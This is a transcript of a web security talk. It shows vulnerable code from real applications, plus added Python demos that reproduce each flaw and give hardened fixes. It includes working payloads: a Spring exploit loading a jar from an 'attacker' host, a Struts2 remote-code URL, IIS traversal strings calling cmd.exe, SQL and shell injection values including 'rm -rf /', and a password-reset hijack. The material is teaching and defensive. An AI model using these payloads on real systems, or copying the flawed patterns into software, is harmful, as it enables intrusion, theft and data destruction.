Transcript: Don't Try This At Home
DON'T TRY THIS AT HOME
Some of the code examples in this presentation may shock even the strongest of developers. If you are faint of heart, or don’t like a good laugh, then it may pay to leave the room...... No really...
All Languages Can Lead To Security Vulnerabilities
Java, PHP, ASP, C#, VB.Net, Perl, Python, Flash, C, C++, CFML
Security Vulnerability
Arbitrary Graph Of Statistics Of Vulnerabilities
Third hit is a vulnerability in a graph application, and it's SQL injection. Have I mentioned 2010 yet?
Source: http://www.cenzic.com/downloads/Cenzic_AppsecTrends_Q3-Q4-2009.pdf
Huh?
Apologies The code you are about to see comes from real applications, only the variable names have been changed to protect the guilty.
If this code resembles yours, you may want to take notes...
What's Wrong With This Picture?
Data access through the framework:
    if (!string.IsNullOrEmpty(Request.QueryString["Eid"]))
        CMSMain.WhereCondition =
            "TitleID IN (SELECT TitleID FROM CMS_Documents WHERE EID = " + Request.QueryString["Eid"] + ")";
Frameworks Don't Always Protect You
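The WHERE condition above is built by string concatenation, so the framework's data-access layer runs whatever the query string contains. The following is an added example (not code from the talk) that reproduces the same subquery against a constructed in-memory SQLite table named CMS_Documents, shows what a single crafted Eid value does to it, and puts the hardened form (type check plus bound parameter) beside it. The table contents and the function names are assumptions.

```python
import sqlite3

# Constructed stand-in for the CMS_Documents table; example data, not from the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE CMS_Documents (TitleID INTEGER, EID INTEGER);
        INSERT INTO CMS_Documents VALUES (1, 10), (2, 10), (3, 20), (4, 30);
    """)
    return conn

SUBQUERY = "SELECT TitleID FROM CMS_Documents WHERE EID = "

def titles_concat(conn, eid):
    """Mirrors the slide: the query-string value is pasted straight into the WHERE condition,
    so the user controls the end of the SQL statement."""
    sql = "SELECT TitleID FROM CMS_Documents WHERE TitleID IN (" + SUBQUERY + eid + ")"
    return sorted(row[0] for row in conn.execute(sql))

def titles_param(conn, eid):
    """Hardened form: validate the type first, then bind the value; the SQL text never changes."""
    if not (isinstance(eid, str) and eid.isdigit()):
        raise ValueError("Eid must be a positive integer")
    sql = "SELECT TitleID FROM CMS_Documents WHERE TitleID IN (" + SUBQUERY + "?)"
    return sorted(row[0] for row in conn.execute(sql, (int(eid),)))

def param_rejects(conn, eid):
    """True if the hardened version refuses the input instead of running it."""
    try:
        titles_param(conn, eid)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    print(titles_concat(db, "10"))               # [1, 2]: what the developer tested
    print(titles_concat(db, "10) OR 1=1 --"))    # [1, 2, 3, 4]: the whole table
    print(titles_param(db, "10"))                # [1, 2]
    print(param_rejects(db, "10) OR 1=1 --"))    # True
```

The payload closes the subquery's parenthesis, appends an always-true condition and comments out the rest of the statement; the framework's WhereCondition property is just a string to it. Binding the value does not change the SQL text, and the digit check turns anything else into a hard error rather than a query.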
Frameworks segue....
Framework Bugs: Spring Framework
Spring Framework execution of arbitrary code (CVE-2010-1622)
http://blog.o0o.nu/2010/06/cve-2010-1622.html
Any form controller:
    POST /adduser HTTP/1.0
    ...
    class.classLoader.URLs[0]=jar:http://attacker/spring-exploit.jar!/
Overwrites the WebappClassLoader URL with an arbitrary remote jar.
Framework Bugs: Struts2/XWork Framework
Struts2 Framework execution of arbitrary code (CVE-2010-1870)
http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html
    http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
Executes arbitrary Java code (here, Runtime.exit(1) on the server).
"Let's make a list..." OWASP Top 10
Trusting Filenames From The User
Image loader, called via pages to display images, passed an image name in the URL:
    public void ProcessRequest(HttpContext context) {
        string ImageUrl = context.Request.QueryString["ImageUrl"];
        ..
        context.Response.WriteFile(ImageUrl);
    }
Retrieve Arbitrary File From Server
Trusting URLs From The User
Help system page loader, called to load help contents from another server, passed a page reference in the URL:
    public byte[] GetBytesFromUrl(string url) {
        var webRequest = (HttpWebRequest)WebRequest.Create(url);
        var webResponse = webRequest.GetResponse();
        using (var responseStream = webResponse.GetResponseStream()) {
            return responseStream.ToBytes();   // ToBytes(): the application's own stream extension method
        }
    }
Make Internal Network Requests
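GetBytesFromUrl will fetch any URL it is handed, which makes the help loader a proxy into the internal network (and, via other schemes, into the local filesystem). The following is an added example, not code from the talk, of the gate a practitioner would put in front of such a fetch: an allowlist of help-content hosts plus rejection of non-HTTP schemes, IP literals and userinfo tricks. The host names and the fetch_help_page wrapper are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumed allowlist of hosts the help loader may fetch from (hypothetical names).
ALLOWED_HOSTS = {"help.example.com", "docs.example.com"}

def is_safe_fetch_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Accept only http(s) URLs whose host is on the allowlist.
    Everything else (other schemes, IP literals, userinfo tricks, lookalike hosts) is refused,
    so the page loader cannot be pointed at internal services."""
    try:
        parts = urlsplit(url)
        host = parts.hostname          # userinfo and port stripped, lower-cased
    except ValueError:
        return False                   # e.g. malformed IPv6 brackets
    if parts.scheme not in ("http", "https"):
        return False                   # file://, ftp://, gopher:// ...
    if not host:
        return False
    try:
        ipaddress.ip_address(host)
        return False                   # raw IPs (127.0.0.1, [::1], 169.254.169.254) are never allowed
    except ValueError:
        pass                           # not an IP literal: fall through to the hostname allowlist
    return host in allowed_hosts

def fetch_help_page(url, fetcher):
    """Gate the fetch behind the check; `fetcher` is whatever HTTP client the application uses."""
    if not is_safe_fetch_url(url):
        raise ValueError("refusing to fetch %r" % url)
    return fetcher(url)

if __name__ == "__main__":
    for candidate in ("http://help.example.com/user/welcome.htm",
                      "http://help.example.com@10.0.0.1/",
                      "http://169.254.169.254/latest/meta-data/",
                      "file:///etc/passwd"):
        print(candidate, "->", is_safe_fetch_url(candidate))
```

Allowlisting by name still trusts DNS: a name on the list can be pointed at an internal address by whoever controls it, or re-pointed between check and connect. Where that matters, resolve the name, check the resulting address against the private ranges, and connect to that address, or route all such fetches through an egress proxy that enforces the policy.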
Using 302 Redirect As Security Measure
Making an unauthenticated request results in a 302 redirect to the login page:
    HTTP/1.1 302 Found
    Location: /admin/login
    Content-Type: text/html; charset=utf-8
    Content-Length: 13226

    Object moved to <a href="/admin/login">here</a>.
That seems suspiciously large for "Object moved to here."
Oh, there it is: the rest of the 13226 bytes is the admin page itself. The redirect only protects browsers that obey the Location header; any client that ignores it reads the page.
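A redirect that carries the protected page in its body is easy to spot once you stop following redirects. The following is an added example, not from the talk, that parses a raw HTTP response and flags a 3xx whose body is bigger than a redirect stub; the two responses it is run against are constructed samples, not real captures.

```python
def build_302(body, location="/admin/login"):
    """Constructed helper: a raw 302 response carrying the given body (sample data, not a capture)."""
    return ("HTTP/1.1 302 Found\r\n"
            "Location: %s\r\n"
            "Content-Type: text/html; charset=utf-8\r\n"
            "Content-Length: %d\r\n\r\n" % (location, len(body.encode())) + body)

def parse_response(raw):
    """Split a raw HTTP/1.x response into (status code, lower-cased header dict, body)."""
    head, sep, body = raw.partition("\r\n\r\n")
    if not sep:
        raise ValueError("no header/body separator")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body

def redirect_leaks_body(raw, max_stub_bytes=512):
    """True when a redirect response carries more than a redirect stub. A browser never shows it,
    but curl, Burp, or any client that does not follow Location reads the protected page."""
    status, headers, body = parse_response(raw)
    if not (300 <= status < 400 and "location" in headers):
        return False
    declared = int(headers.get("content-length", len(body)))
    return max(declared, len(body)) > max_stub_bytes

# Constructed samples: the stub a proper redirect carries, and one that carries the admin console.
STUB_302 = build_302('Object moved to <a href="/admin/login">here</a>.')
LEAKY_302 = build_302("<html><body><h1>Admin console</h1>"
                      + "<tr><td>user row</td></tr>" * 500 + "</body></html>")

if __name__ == "__main__":
    print("stub leaks:", redirect_leaks_body(STUB_302))    # False
    print("leaky leaks:", redirect_leaks_body(LEAKY_302))  # True
```

The same check by hand is `curl -i` (which does not follow redirects unless given -L) against a protected URL: if the 302 comes back with thousands of bytes of body, the page was rendered before the authorisation decision. The fix on the server side is to return the redirect and stop, never to render the page and then redirect.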
Things that work
Things that DO NOT work
Posting the CAPTCHA answer along with the response:
    POST /captcha HTTP/1.0
    answer=kbpsh&response=kbpsh....
Posting the CAPTCHA 'id' along with the response (the client picks which challenge it is answering)
Using HTML to display the CAPTCHA 'word':
    Please type in these letters: kbpsh
Using HTML to display a mathematical equation to solve
Shopping Cart Troubles
Usual Shopping Process
My Shopping Process: Add To Cart Contents After Payment Processed
Flash Accepts User Input
Image loader: Flash loaded by an HTML page, HTML page sets parameters. Can be set via URL parameters:
    private var imgPath:String = "http://localhost/sample.jpg";
    imgPath = this.loaderInfo.parameters.img;
    img_holder = new Image(imgPath);
Flash movie hosted on your site, loading images from the attacker's site.
Cross System Data Truncation: Forgotten Password Feature
Page accepts an email address, checks it is not empty and calls a stored procedure:
    strEmail = Request.Form("txtemail")
    If strEmail <> "" Then
        objQRY.ClearParameters
        objQRY.AddParameter "@email", trim(strEmail)
        set rsLogin = objQRY.ReturnRS("spUserMatch")
The stored procedure does a user lookup, truncating the input to 100 characters:
    CREATE PROCEDURE [dbo].[spUserMatch] @email varchar(100) = null ...
If the user exists, send an email with the new password:
    Set Mailer = Server.CreateObject("SMTPsvg.Mailer")
    Mailer.Subject = "New Password"
    Mailer.BodyText = strBody
    Mailer.Recipient = strEmail
The lookup matched on the truncated value, but the mail uses the original (non-truncated) input: the attacker receives a copy of the email.
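The bug is that two systems see two different values: the database compares the first 100 characters, the mailer sends to all of them. The following is an added example, not code from the talk, that models both behaviours in Python (the varchar(100) cut with SQL Server's trailing-space-insensitive comparison, and a mailer that accepts a comma-separated recipient list; the latter is an assumption about the mail component, which the page does not show), builds the padded payload, and shows the hardened flow that validates length and format before the lookup and mails only the stored address. The user table is constructed data.

```python
import re

EMAIL_COLUMN_WIDTH = 100   # width of spUserMatch's @email varchar(100) parameter, from the page

# Constructed user table: email -> user id (example data, not from the page).
USERS = {"victim@example.com": 42}

def sp_user_match(email):
    """Model of the stored procedure. The parameter is silently cut to varchar(100); SQL Server's
    string comparison ignores trailing spaces, so a padded value still matches the victim's row."""
    truncated = email[:EMAIL_COLUMN_WIDTH].rstrip(" ")
    return USERS.get(truncated)

def mailer_recipients(recipient):
    """Assumed model of the mail component: a recipient string containing ',' or ';' is delivered to
    every address in it (common mailer behaviour; the page does not show SMTPsvg's parsing)."""
    return [a.strip() for a in re.split(r"[;,]", recipient) if a.strip()]

def forgot_password_vulnerable(form_email):
    """The page's flow: look up with the trimmed input, then mail the original input."""
    uid = sp_user_match(form_email.strip())
    if uid is None:
        return None
    return mailer_recipients(form_email)

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def forgot_password_fixed(form_email):
    """Validate length against the column width and format against a whitelist pattern before the
    lookup, then send to the address stored on the matched account, never to the raw input."""
    email = form_email.strip()
    if len(email) > EMAIL_COLUMN_WIDTH or not EMAIL_RE.match(email):
        return None
    uid = sp_user_match(email)
    if uid is None:
        return None
    stored = next(e for e, u in USERS.items() if u == uid)
    return [stored]

def attacker_payload(victim, attacker):
    """Pad the victim's address out to the column width, then append the attacker as a second recipient."""
    return victim.ljust(EMAIL_COLUMN_WIDTH) + "," + attacker

if __name__ == "__main__":
    payload = attacker_payload("victim@example.com", "attacker@evil.net")
    print(forgot_password_vulnerable(payload))   # ['victim@example.com', 'attacker@evil.net']
    print(forgot_password_fixed(payload))        # None
```

The general rule this illustrates: when a value crosses a boundary (application to database, database to mailer), the limits of every consumer apply to the input, and the value that was validated must be the value that is used. Here the shortest limit is 100 characters, so anything longer is rejected outright rather than quietly shortened by one consumer and not the other.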
Cookie Data Serialisation
Object serialised, Base64 encoded and stored as a cookie:
    // create map
    java.util.HashMap map = new java.util.HashMap();
    map.put("UserId", UserId);
    map.put("email", email);
    // serialise and B64 it (buffer: the stream the map was serialised into, elided on the slide)
    String info = java.net.URLEncoder.encode(
        new String(org.apache.commons.codec.binary.Base64.encodeBase64(buffer.toByteArray()), "UTF-8"), "UTF-8");
    // store it in cookie
    org.apache.cocoon.environment.http.HttpCookie cookie =
        new org.apache.cocoon.environment.http.HttpCookie("SESSION", info);
The object is stored insecurely in the cookie. Base64 is not encryption, and it is not integrity protection either: the cookie data can be decoded, modified, re-encoded and sent back. The application deserialises it and trusts it, and the attacker gains access as another UserId.
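Base64 only changes the alphabet of the data; anything the client can decode it can re-encode. The following is an added example, not code from the talk, that reproduces the pattern in Python with JSON standing in for Java serialisation, performs the decode-modify-recode step an attacker would, and then shows the minimum that stops it: an HMAC over the exact cookie bytes, verified in constant time before anything is parsed. The key and the session contents are constructed.

```python
import base64
import hashlib
import hmac
import json

SECRET_KEY = b"constructed-example-key-load-this-from-a-secret-store"   # never hardcoded in real code

def make_cookie(data):
    """The page's pattern, with JSON standing in for Java serialisation: serialise, base64, store."""
    return base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode()).decode()

def read_cookie(value):
    """What the application does: decode and trust."""
    return json.loads(base64.urlsafe_b64decode(value))

def tamper(cookie_value, **changes):
    """What the attacker does: decode, modify, re-encode. Works on the plain cookie; on the signed
    cookie it yields a payload with no valid MAC."""
    data = read_cookie(cookie_value.split(".")[0])
    data.update(changes)
    return make_cookie(data)

def make_signed_cookie(data, key=SECRET_KEY):
    """payload.hexmac: the MAC covers the exact bytes the client sends back."""
    payload = base64.urlsafe_b64encode(json.dumps(data, sort_keys=True).encode())
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest()
    return payload.decode() + "." + tag

def read_signed_cookie(value, key=SECRET_KEY):
    """Return the data only if the MAC verifies, else None. Integrity only: the content is still
    readable by the client, so put nothing secret in it (or encrypt as well)."""
    payload, dot, tag = value.rpartition(".")
    if not dot:
        return None
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(base64.urlsafe_b64decode(payload))

if __name__ == "__main__":
    session = {"UserId": 1001, "email": "alice@example.com"}
    plain = make_cookie(session)
    print(read_cookie(tamper(plain, UserId=1)))          # {'UserId': 1, 'email': ...}: now user 1
    signed = make_signed_cookie(session)
    print(read_signed_cookie(tamper(signed, UserId=1)))  # None: MAC missing
```

Two caveats a reviewer would add. First, signing does not make the cookie secret; it makes it unforgeable, which is the property the login check needs. Second, feeding client-supplied bytes into a native deserialiser (Java's ObjectInputStream here) is a risk in its own right regardless of the MAC check's placement, so verify the MAC first and keep the format to something like JSON or a fixed set of fields.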
Let's Not Leave Out PHP: Execute system() With User Supplied Input
This was for real.... in a 'security' appliance used by .mil
    if ($_GET["cmd"] == "TERMEND") {
        $sid = $_GET["param"];
        $cmd = "/var/www/htdocs/utt/Queue.pl delete_message_queue $sid";
        system($cmd);
    }
Did I mention that it was unauthenticated access?
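Anything in $param that the shell treats as syntax becomes a second command. The following is an added example, not code from the appliance or the talk, that builds the same command line in Python, tokenises it the way a POSIX shell would so the injected command is visible, and shows the hardened form: whitelist-validate the session id, then execute an argv list with no shell. The session-id format is an assumption; nothing is executed in the example itself.

```python
import re
import shlex
import subprocess

QUEUE_TOOL = "/var/www/htdocs/utt/Queue.pl"      # path from the page
SID_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")    # assumed format of a queue session id (hypothetical)

def build_shell_command(sid):
    """Mirrors the PHP: one string handed to system(), so shell metacharacters in $sid are executed."""
    return "%s delete_message_queue %s" % (QUEUE_TOOL, sid)

def shell_would_see(command):
    """Tokenise the way a POSIX shell does, to show where the injected command begins."""
    return list(shlex.shlex(command, posix=True, punctuation_chars=True))

def is_valid_sid(sid):
    return bool(SID_RE.match(sid))

def build_argv(sid):
    """Hardened form: whitelist-validate, then build an argv list; no shell is involved."""
    if not is_valid_sid(sid):
        raise ValueError("invalid session id")
    return [QUEUE_TOOL, "delete_message_queue", sid]

def delete_message_queue(sid, runner=subprocess.run):
    """runner is injectable so the call can be inspected without executing anything."""
    return runner(build_argv(sid), shell=False, check=True)

if __name__ == "__main__":
    evil = "1; rm -rf /"
    print(shell_would_see(build_shell_command(evil)))   # [..., '1', ';', 'rm', '-rf', '/']
    print(is_valid_sid(evil), is_valid_sid("abc_123"))  # False True
```

The argv form removes the shell, so there is nothing for ';', '|' or '$(...)' to mean; the whitelist check is still needed because Queue.pl itself might interpret an odd-looking id. Neither fixes the other problem on the slide: the endpoint must also require authentication before it touches the queue at all.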
Cookies: Well, This Sure Looks Useful
    void CheckLoginCount() {
        HttpCookie cookie = Request.Cookies["LoginAttempts"];
        if (cookie != null) {
            int attempts = int.Parse(cookie.Value);
            if (attempts >= 5)
                Redirect("~/AccessDenied.aspx");
        }
    }
The lockout counter lives in a cookie the client controls: delete it, or send LoginAttempts=0, and the limit never triggers.
More Cookies: Remember Me Functionality
User selects remember me. The application generates a random token and stores it in the cookie and in the database:
    $token = substr(md5(uniqid(rand(), true)), 0, 49 - strlen($this->ID));
    $this->RememberLoginToken = $token;
    Cookie::set('rem_me', $this->ID . ':' . $token);
User selects logout. The application sets the token to null and stores null in the cookie and in the database:
    $this->RememberLoginToken = null;
    Cookie::set('rem_enc', null);
If the user doesn't log out they use the autologin feature. The application loads the user based on the cookie value and checks that the tokens match:
    list($uid, $token) = explode(':', Cookie::get('rem_me'), 2);
    $a_uid = Convert::raw2sql($uid);
    $user = DataObject::get_one("User", "User.ID = '$a_uid'");
    if ($user && $user->RememberLoginToken != $token) {
        $member = null;
    }
What happens if $token is empty (null)? In PHP, null != '' is false, so a cookie of "<id>:" passes the check against a logged-out user's null token.
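The following is an added example, not code from the talk or from the application it describes, that reproduces the autologin check in Python with a helper that mimics PHP's loose comparison of null against a string, and places the hardened check beside it: a non-empty token on both sides and a constant-time compare. The user table is constructed.

```python
import hmac
import secrets

class User:
    def __init__(self, uid):
        self.id = uid
        self.remember_token = None   # RememberLoginToken: None until "remember me", None again after logout

USERS = {7: User(7)}   # constructed user table

def issue_remember_me(user):
    """Login with 'remember me': a fresh random token goes into the cookie and into the database."""
    token = secrets.token_urlsafe(32)
    user.remember_token = token
    return "%d:%s" % (user.id, token)

def logout(user):
    user.remember_token = None

def php_loose_ne(a, b):
    """PHP's != between null and a string: null is coerced to '', so null != '' is false."""
    return (a if a is not None else "") != (b if b is not None else "")

def load_user(uid):
    return USERS.get(int(uid)) if uid.isdigit() else None

def autologin_vulnerable(cookie):
    """The page's check: drop the user only when the stored token is loosely unequal to the cookie's."""
    uid, _, token = cookie.partition(":")
    user = load_user(uid)
    if user and php_loose_ne(user.remember_token, token):
        user = None
    return user

def autologin_fixed(cookie):
    """Require a non-empty token on both sides and compare in constant time."""
    uid, _, token = cookie.partition(":")
    if not token:
        return None
    user = load_user(uid)
    if user is None or not user.remember_token:
        return None                      # logged out (token cleared) or never issued
    if not hmac.compare_digest(user.remember_token.encode(), token.encode()):
        return None
    return user

if __name__ == "__main__":
    u = USERS[7]
    cookie = issue_remember_me(u)
    logout(u)
    print(autologin_vulnerable("7:"))    # <User 7>: logged in with an empty token
    print(autologin_fixed("7:"))         # None
```

Two further points a reviewer would raise against the original: md5(uniqid(rand())) is not a cryptographically random token, so use the platform CSPRNG as above; and storing the token in clear in the database means a database read gives persistent logins for every user, so store a hash of it and compare hashes instead.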
Evil Users Never Trust User Supplied Input
No really, users are evil And Hands Leap Out Of Matrix Style Backgrounds
Input Validation
Input validation is the key. No, I didn't say 'silver bullet'. Properly implemented, it can prevent most application vulnerabilities.
Validate at input: validate all input to ensure it conforms to the required format.
Validate all input: text strings, cookie values, HTTP headers, file data, path names, URL values, currency, data from databases, 3rd parties and web services.
Client side validation should only be used to reduce browser requests. Never rely on client side validation for security.
Backend validation: validate the data, and ensure the user is authorised to access the data records. It should not matter what values the user sends.
Data Normalisation
Data comes in many forms:
    "this is data"
    %74%68%69%73%20%69%73%20%64%61%74%61
    this is 0;data
    "ThIs iS dAtA"
Many paths to the same location:
    /help.jsp?page=user/welcome.htm
    /help.jsp?page=user/../admin/welcome.htm
    /help.jsp?page=user\..\admin/welcome.htm
    /help.jsp?page=user\/\/..//\\/admin/welcome.htm
    /help.jsp?page=help.jsp
Data decoding or normalisation, depending on the application: decode or reject.
Detect encoded data: decode the data and compare to the original.
Decode recursively to its lowest form: concatenation of paths, multiple layers of encoding.
Formalise the decoding order, to prevent unintended decoding later in the application.
Data Decoding And Validation FAIL
MS extended Unicode vulnerability (IIS checked the path, then decoded the overlong UTF-8 into a separator):
    /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir
MS double decode vulnerability (IIS decoded a second time, after the check):
    /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
Nginx source code disclosure (the trailing encoded space stops the .php handler from matching, so the file is served as static content):
    http://www.example.com/file.php%20
Conforms: Ensure Data Conforms To The Required Format
Check length, type, min() and max() values; alphanumeric only; must be a valid date.
Reject bad data: do not attempt to fix it up, it easily leads to confusion.
Use data whitelists: check against a list of known good values. It is easier to know which values are good input. This is the recommended approach.
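The normalisation steps above (decode recursively, fix the decoding order, then compare against a whitelist) fit together into one resolver for the help.jsp?page= parameter. The following is an added example, not code from the talk, that does exactly that for the page values listed earlier: it percent-decodes until the value stops changing, rejects runaway nesting and NUL bytes, unifies both separators, collapses dot segments, and only then checks the canonical form against a whitelist and confirms the final path is still under the help root. The root directory and the whitelist are assumptions.

```python
import posixpath
from urllib.parse import unquote

HELP_ROOT = "/var/www/help"      # assumed document root for help pages (hypothetical)
ALLOWED_PAGES = {"user/welcome.htm", "user/orders.htm"}   # constructed whitelist for ordinary users

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing (so %252e becomes '.'), rejecting pathological
    nesting and any NUL byte that decoding introduced."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    else:
        raise ValueError("too many encoding layers")
    if "\x00" in value:
        raise ValueError("NUL byte in input")
    return value

def normalise_page(param):
    """One canonical relative path: decode, unify separators, collapse '.' and '..' segments."""
    value = fully_decode(param).replace("\\", "/")
    return posixpath.normpath("/" + value).lstrip("/")

def resolve_help_page(param, allowed=ALLOWED_PAGES, root=HELP_ROOT):
    """Whitelist the canonical form, then confirm the joined path is still under the root.
    Returns the absolute path to serve, or None for anything that should be rejected."""
    try:
        canonical = normalise_page(param)
    except ValueError:
        return None
    if canonical not in allowed:
        return None
    full = posixpath.normpath(posixpath.join(root, canonical))
    if not full.startswith(root + "/"):
        return None
    return full

if __name__ == "__main__":
    for page in ("user/welcome.htm", "user/../admin/welcome.htm", "user\\..\\admin/welcome.htm",
                 "user\\/\\/..//\\\\/admin/welcome.htm", "%252e%252e%252fadmin/welcome.htm", "help.jsp"):
        print(repr(page), "->", resolve_help_page(page))
```

The order matters: decoding after the whitelist check is the Unicode and double-decode failure above in miniature. On Windows hosts the canonical form also needs case folding and handling of 8.3 short names and trailing dots or spaces, which this POSIX-style resolver does not attempt.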
Sanitise Data For Use
Data will be used in different places: SQL, XML, output, log files. Each requires different sanitisation: remove meta characters, remove special characters, remove linefeeds.
Use standard, formalised, reusable code blocks. Most languages contain these, and OWASP supplies some. Homebrew stuff should be well tested and documented at the start of development.
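"Different places need different sanitisation" is the point a single escape() function gets wrong. The following is an added example, not code from the talk, with one small encoder per output context, each built on the standard library: HTML text, HTML attribute, a string literal inside a script block, and a log line. The sample strings are constructed.

```python
import html
import json
import re

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

def for_html_text(value):
    """Element content: <, >, & and quotes become entities so the data cannot open a tag."""
    return html.escape(value, quote=True)

def for_html_attr(value):
    """Attribute value: same entities, and the encoder supplies the quotes so the caller cannot forget them."""
    return '"' + html.escape(value, quote=True) + '"'

def for_js_literal(value):
    """Inside a <script> block: a JSON string literal, with '</' split so it cannot close the script tag."""
    return json.dumps(value).replace("</", "<\\/")

def for_log(value):
    """Log line fragment: control characters (above all CR and LF) are escaped so one request cannot
    forge extra log lines or push earlier ones out of view."""
    return CONTROL_CHARS.sub(lambda m: "\\x%02x" % ord(m.group()), value)

if __name__ == "__main__":
    sample = '<script>alert(1)</script>'
    print(for_html_text(sample))
    print(for_html_attr('" onmouseover="x'))
    print(for_js_literal('</script><script>1'))
    print(for_log("bob\r\n[INFO] login ok for admin"))
```

The SQL case is deliberately absent: for SQL the right tool is a bound parameter, not an encoder, as the concatenated WHERE condition earlier in the talk shows. Each of these helpers is only correct for its own context; HTML-encoding a value and then placing it in a log file, or in a script block, leaves the other context's metacharacters untouched.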
When Filtering Goes Wrong
This is not filtering:
    If (imageurl = "/web.config") exit()
And yes, XSS without